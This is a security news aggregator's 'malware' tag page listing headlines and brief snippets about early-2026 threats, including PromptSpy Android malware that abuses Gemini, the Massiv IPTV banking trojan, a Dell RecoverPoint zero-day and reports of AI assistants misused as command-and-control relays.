Tag: malware
-
PromptSpy is the first Android malware to use generative AI at runtime
Researchers have discovered the first known Android malware to use generative AI in its execution flow, using Google’s Gemini model to adapt its persistence across different devices. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/promptspy-is-the-first-android-malware-to-use-generative-ai-at-runtime/
-
Google says its AI systems helped deter Play Store malware in 2025
Google said it prevented 1.75 million bad apps from going live on Google Play during 2025, a figure that’s down from previous years. First seen on techcrunch.com Jump to article: techcrunch.com/2026/02/19/google-says-its-ai-systems-helped-deter-play-store-malware-in-2025/
-
PromptSpy Android Malware Abuses Gemini AI to Automate Recent-Apps Persistence
Cybersecurity researchers have discovered what they say is the first Android malware that abuses Gemini, Google’s generative artificial intelligence (AI) chatbot, as part of its execution flow and achieves persistence.The malware has been codenamed PromptSpy by ESET. The malware is equipped to capture lockscreen data, block uninstallation efforts, gather device information, take screenshots, First seen…
-
Crims hit a $20M jackpot via malware-stuffed ATMs
FBI warns these cyber-physical attacks are on the rise First seen on theregister.com Jump to article: www.theregister.com/2026/02/19/crims_atm_jackpotting/
-
PromptSpy Android malware may exploit Gemini AI
A newly-uncovered malware targeting the Android operating system seems to exploit Google’s Gemini GenAI tool to help it maintain persistence. First seen on computerweekly.com Jump to article: www.computerweekly.com/news/366639201/PromptSpy-Android-malware-may-exploit-Gemini-AI
-
The Cloud and AI Velocity Trap: Why Governance Is Falling Behind Innovation
Tags: access, ai, attack, business, cloud, compliance, control, cyber, data, flaw, framework, governance, grc, iam, identity, least-privilege, malicious, malware, radius, risk, risk-management, service, supply-chain, tactics, threat, tool, vulnerability, zero-trustAI adoption is outpacing traditional cyber governance. The “Tenable Cloud and AI Security Risk Report 2026” reveals how overprivileged identities and unmonitored supply chain dependencies leave orgs exposed. We offer 10 tactics to shut down your most critical attack paths. Key takeaways The velocity trap: Security teams are fighting “machine-speed” threats with manual processes; you…
-
The Cloud and AI Velocity Trap: Why Governance Is Falling Behind Innovation
Tags: access, ai, attack, business, cloud, compliance, control, cyber, data, flaw, framework, governance, grc, iam, identity, least-privilege, malicious, malware, radius, risk, risk-management, service, supply-chain, tactics, threat, tool, vulnerability, zero-trustAI adoption is outpacing traditional cyber governance. The “Tenable Cloud and AI Security Risk Report 2026” reveals how overprivileged identities and unmonitored supply chain dependencies leave orgs exposed. We offer 10 tactics to shut down your most critical attack paths. Key takeaways The velocity trap: Security teams are fighting “machine-speed” threats with manual processes; you…
-
Android malware taps Gemini to navigate infected devices
The real deal or another research project overblown? First seen on theregister.com Jump to article: www.theregister.com/2026/02/19/genai_malware_android/
-
Android malware taps Gemini to navigate infected devices
The real deal or another research project overblown? First seen on theregister.com Jump to article: www.theregister.com/2026/02/19/genai_malware_android/
-
China-Linked Hackers Use Dell RecoverPoint Flaw to Drop GrimBolt Malware
Dell warns of a critical security hole in its RecoverPoint software exploited by hackers. Learn how to protect your data from the CVE-2026-22769 vulnerability and the new GrimBolt malware. First seen on hackread.com Jump to article: hackread.com/china-hackers-dell-recoverpoint-flaw-grimbolt-malware/
-
Malvertising gegen Mac-Nutzer über Evernote-Links
Beliebte Software und Tools bleiben wirksame Lockvogel-Angebote im Dienste von Cyberkriminellen. Aktuell nutzen sie Google-Anzeigen für Mac-Nutzer mit Interesse an Anwendungen wie Microsoft-Office, Libre-Office, Notepad++, 7-Zip, VLC oder Final-Cut-Pro. Die Täter leiten ihre Opfer auf in Evernote geteilte Seiten mit bösartigen Links. Nach Klick auf die Links mit den vermeintlichen Angeboten führen die Opfer Kommandos…
-
Malvertising gegen Mac-Nutzer über Evernote-Links
Beliebte Software und Tools bleiben wirksame Lockvogel-Angebote im Dienste von Cyberkriminellen. Aktuell nutzen sie Google-Anzeigen für Mac-Nutzer mit Interesse an Anwendungen wie Microsoft-Office, Libre-Office, Notepad++, 7-Zip, VLC oder Final-Cut-Pro. Die Täter leiten ihre Opfer auf in Evernote geteilte Seiten mit bösartigen Links. Nach Klick auf die Links mit den vermeintlichen Angeboten führen die Opfer Kommandos…
-
Proaktive Bedrohungsaufklärung und einheitlicher Schutz gewinnen angesichts wachsender Komplexität zunehmend an Bedeutung
Mit Blick auf das zweite Halbjahr 2025 verzeichnet Watchguard Technologies im aktuellen Internet-Security-Report einen rapiden Anstieg evasiver und verschlüsselter Malware. Dieser Trend markiert die Notwendigkeit proaktiver und ganzheitlicher Sicherheitsansätze. Basierend auf anonymisierten, aggregierten Bedrohungsinformationen aus Watchguards Netzwerk-, Endpoint- und DNS-Filter-Lösungen macht der Report deutlich, dass sowohl Volumen als auch Raffinesse von Malware-Angriffen steigen. Dabei werden…
-
PromptSpy: First Android malware to use generative AI in its execution flow
ESET researchers have discovered PromptSpy, the first known Android malware to abuse generative AI as part of its execution flow in order to achieve persistence. This marks … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/02/19/promptspy-android-malware-generative-ai/
-
Infostealer Found Stealing OpenClaw AI Identity and Memory Files
Researchers at Hudson Rock have identified a live infection where an infostealer exfiltrated a victim’s OpenClaw configuration. The discovery highlights a shift in malware behaviour toward harvesting personal AI identity files. First seen on hackread.com Jump to article: hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/
-
Massiv Attack: Android Trojan Targets IPTV Users
New Trojan May Soon Be Offered for Sale to Criminal Underground. Security researchers warn of Massiv, an Android Trojan – disguised as an IPTV app – targeting users who sideload streaming apps. The malware enables screen capture, overlays and credential theft – and may soon be marketed on criminal underground forums as malware as a…
-
New ‘Massiv’ Android banking malware poses as an IPTV app
A newly identified Android banking trojan named Massiv has been under active distribution across south Europe, disguised as an IPTV app. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-massiv-android-banking-malware-poses-as-an-iptv-app/
-
Fake IPTV Apps Spread Massiv Android Malware Targeting Mobile Banking Users
Cybersecurity researchers have disclosed details of a new Android trojan called Massiv that’s designed to facilitate device takeover (DTO) attacks for financial theft.The malware, according to ThreatFabric, masquerades as seemingly harmless IPTV apps to deceive victims, indicating that the activity is primarily singling out users looking for the online TV applications.”This new threat, while First…
-
Hackers Hide Malware in Emoji-Based Code to Bypass Security Defenses
Hackers are increasingly abusing emoji and other Unicode tricks to hide malicious code, bypass filters, and evade modern security controls, including AI-powered defenses. This emerging technique, known as emoji or Unicode smuggling, turns harmless-looking characters into stealth carriers for commands, data, and exploit payloads. Emoji smuggling is an obfuscation technique in which attackers encode malicious content using…
-
Hackers Hide Malware in Emoji-Based Code to Bypass Security Defenses
Hackers are increasingly abusing emoji and other Unicode tricks to hide malicious code, bypass filters, and evade modern security controls, including AI-powered defenses. This emerging technique, known as emoji or Unicode smuggling, turns harmless-looking characters into stealth carriers for commands, data, and exploit payloads. Emoji smuggling is an obfuscation technique in which attackers encode malicious content using…
-
CRESCENTHARVEST Campaign Targets Iran Protest Supporters With RAT Malware
Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran’s ongoing protests to conduct information theft and long-term espionage.The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, with the attacks designed to deliver a malicious payload that serves as a remote access trojan (RAT)…
-
Chinese hackers exploited zero-day Dell RecoverPoint flaw for 1.5 years
Pivot techniques: In addition to the payloads themselves, the investigation also revealed new techniques. For example, the legitimate shell script convert_hosts.sh that exists on these appliances has been modified to include the path of the backdoors to achieve persistence.The SLAYSTYLE web shell, which is designed to receive commands over HTTP and execute them on the…
-
Notepad++ patches flaw used to hijack update system
Notepad++ patched a vulnerability that attackers used to hijack its update system and deliver malware to targeted users. Notepad++ fixed a vulnerability that allowed a China-linked APT group to hijack its update mechanism and selectively push malware to chosen targets. In early February, the Notepad++ maintainer revealed that nation-state hackers compromised the hosting provider’s infrastructure,…
-
Zero-Day in Dell RecoverPoint Enables GRIMBOLT Backdoor
A Dell RecoverPoint zero-day has been exploited to deploy GRIMBOLT malware and pivot into VMware environments. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/zero-day-in-dell-recoverpoint-enables-grimbolt-backdoor/
-
AI platforms can be abused for stealthy malware communication
AI assistants like Grok and Microsoft Copilot with web browsing and URL-fetching capabilities can be abused to intermediate command-and-control (C2) activity. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-platforms-can-be-abused-for-stealthy-malware-communication/
-
AI Assistants Used as Covert CommandControl Relays
AIs like Grok and Microsoft Copilot can be exploited as covert C2 channels for malware communication First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/ai-assistants-covert-c2-relays/